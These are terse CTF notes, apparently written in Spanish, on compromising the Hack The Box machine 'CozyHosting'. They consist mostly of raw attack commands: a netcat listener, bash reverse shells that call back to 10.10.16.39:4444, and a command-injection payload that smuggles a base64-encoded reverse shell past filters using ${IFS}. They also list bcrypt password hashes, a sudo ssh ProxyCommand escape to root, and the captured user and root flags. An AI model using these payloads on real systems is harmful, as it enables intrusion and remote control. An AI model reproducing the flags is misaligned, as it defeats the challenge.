SO: linux
IP 10.10.11.230
Puertos y Versiones:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


nc -l -v -p 4444
;echo${IFS}'
echo "bash -i >& /dev/tcp/10.10.16.39/4444 0">&1
sh -i >& /dev/tcp/10.10.16.39/4444 0>&1  esto enviar a 64 bits

;echo${IFS}'c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMzkvNDQ0NCAwPiYx'|base64${IFS}-d|bash;#
;python3${IFS}-m${IFS}http.server${IFS}8081;#

admin $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm 
kanderson  $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *
sudo ssh -o ProxyCommand='; sh 0<&2 1>&2' x

3G78Ar4JG0cwH$gLGGDn6.Tn/jDbxptkpSAHXE1N7WzC39fcVZUJSFRzklvh0fE5E2PXviQFZmgi9Dw7ItBt.YnXTe7/3Z9phS5/
  shell: /bin/bash

--===============237933670802


cat root.txt
c471d58d85b088725a0036ab0076911e
cat user.txt
9646600fd498010fe0ab3425b5e1a95f
